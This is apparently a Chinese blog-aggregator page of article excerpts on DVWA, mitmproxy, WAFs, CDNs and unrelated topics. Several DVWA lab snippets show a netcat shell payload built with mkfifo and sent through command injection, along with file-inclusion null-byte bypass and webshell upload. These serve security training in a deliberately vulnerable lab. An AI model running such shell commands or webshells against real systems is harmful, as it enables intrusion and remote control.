DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute ...
分类:
其他好文 时间:
2020-02-07 22:27:24
阅读次数:
90
"Link" 我们称自身为前缀最大值的位置为 上升位 ,称$P$中原油的上升位为 原上升位 ,称$X,Y$中不是$P$中的上升位的上升位为 新上升位 。 因为题目是要求字典序最小,因此我们可以高位贪心,能选$0$则选$0$。 显然$P$的上升位到了$X,Y$中一定还是上升位,但是$X,Y$中可能会有 ...
分类:
其他好文 时间:
2020-02-07 20:42:35
阅读次数:
76
开门见山 · 目录遍历 替换成 2. 文件包含可以使用 绝对路径 也可以 3. 可以使用文件包含来包含一个网址,或者是一个shell 远程文件 空字符绕过字符过滤 %00 ...
分类:
其他好文 时间:
2020-02-06 16:48:30
阅读次数:
122
开门见山 ·Low ·Medium ·High · 命令执行监听端口 ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe nc 192.168.31.100 4444 · 反弹shell 拷贝shell文件 启动kali的apache服 ...
分类:
其他好文 时间:
2020-02-06 16:14:05
阅读次数:
88
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute ...
分类:
数据库 时间:
2020-02-04 18:47:01
阅读次数:
83
VA1:=HHV(HIGH,12)-LLV(LOW,26); VA2:=HHV(HIGH,9)-CLOSE; VA3:=CLOSE-LLV(LOW,9); VA4:=VA2/VA1*100-70; VA5:=(CLOSE-LLV(LOW,60))/(HHV(HIGH,60)-LLV(LOW,60)) ...
分类:
其他好文 时间:
2020-02-04 18:39:13
阅读次数:
212
[TOC] mitmproxy是什么 也就是 中间人攻击,顾名思义,mitmproxy就是一个可以用作中间人的基于python环境的工具包,可以用于查看流量,抓包改包,重放,可以实现和burpsuite一样的功能,但是我觉得mitmproxy最大的优势是基于python平台可以灵活地开发插件脚本。 ...
分类:
其他好文 时间:
2020-02-03 15:28:47
阅读次数:
130
分享10个可免费使用的网站CDN加速服务 CDN也称内容分发网络,其原理大概是将服务内容分发至全网加速节点,让用户从就近的服务器节点上获取内容,从而提高网站的访问速度。大部分服务商(如阿里云,网易蜂巢,京东云等)的CDN服务是按使用量收费的,也有一些服务商提供免费的CDN服务,本文简单的总结一下目前 ...
分类:
其他好文 时间:
2020-02-03 13:45:01
阅读次数:
68
WAF Web Application Firewall的缩写为“WAF”,中文意思“Web应用防火墙”,也称“网站应用级入侵防御系统”。WAF是集web防护、网页保护、负载均衡、应用交付于一体的web整体安全防护设备。 WAF部署在web服务器前面,串行接入,主要技术是对入侵的检测能力,尤其是对W ...
分类:
其他好文 时间:
2020-02-03 13:36:52
阅读次数:
104
简单的文件上传漏洞(靶机安全级别:low) 事先准备好一句话木马,密码为pass 上传一句话木马,显示上传路径(一般网站是不会显示路径的,这里靶机为了方便你测试漏洞,直接显示出了路径: ../../hackable/uploads/pass.php succesfully uploaded!) 我们 ...
分类:
Web程序 时间:
2020-02-02 14:14:38
阅读次数:
169
